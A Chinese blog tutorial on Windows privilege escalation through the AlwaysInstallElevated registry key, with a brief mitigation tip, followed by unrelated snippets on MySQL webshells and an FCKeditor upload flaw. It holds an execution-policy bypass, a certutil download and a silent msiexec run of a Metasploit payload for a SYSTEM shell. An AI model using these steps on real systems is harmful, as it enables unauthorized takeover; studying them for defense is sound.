利用AlwaysInstallElevated提權

2021-10-10 10:57:41 字數 1731 閱讀 2901

2.啟用alwaysinstallelevated

3.提權

4.防禦方式

5.參考文章

alwaysinstallelevated是登錄檔的乙個鍵值,當其值為1的時候,普通使用者即可以system許可權安裝msi程式。

certutil.exe  -urlcache -split -f
開啟powershell,繞過執行策略並新增倒入powerup模組

set

-executionpolicy bypass -scope process

..\powerup.ps1

使用get-registryalwaysinstallelevated命令

綜上確定沒有啟用alwaysinstallelevated

reg query hkcu\software\policies\microsoft\windows\installer /v alwaysinstallelevated

也確定了沒有啟用alwaysinstallelevated。

啟用它可以通過修改登錄檔的鍵值或者在圖形化頁面上啟用。

圖形化如下,路徑為計算機設定\管理模版\windows元件\windows installer,選中已啟用即可,需要管理員許可權:

通過修改登錄檔

修改登錄檔的這兩項需要有下面兩許可權:

使用whoami /priv可以檢視許可權。

用msf生成exe

使用exemsi將exe封裝為msi。

軟體頁面如下,這一部很簡單,不過多闡述。

執行msi程式,得到system許可權的shell。

受害者機器上執行:msiexec /q /i 1.msi

攻擊者機器上彈回shell:

時刻監控alwaysinstallelevated鍵,在不必要的情況下,請將alwaysinstallelevated設定為false。

利用alwaysinstallelevated提權的測試分析

mysql 利用 mysql利用

mysql 寫入webshell復現 1.直接寫入 windows成功率較高 1.檢視是否允許可寫 空可寫,null不行,5.5以前預設為空,5.5以後預設為null 2.寫入檔案 2.日誌檔案寫入shell 5.0以後會建立日誌檔案 資料庫許可權 1.檢視是否開啟日誌 2.開啟日誌 3.設定路徑 ...

鉤子的利用

在 ae 開發中,可以利用鉤子把 mapcontrol 給傳到由 itool 或者icommond 繼承的命令或者工具裡,傳進去的鉤子就是 hook 型別是乙個 object 實際上就是乙個 mapcontrol 可以用強制轉換為 mapcontrol icommand gtcstandard if...

FCKeditor漏洞利用

行35 36 config allowedextensions file array 允許的上穿型別 config deniedextensions file array php php3 php5 phtml asp aspx ascx jsp cfm cfc pl bat exe dll reg...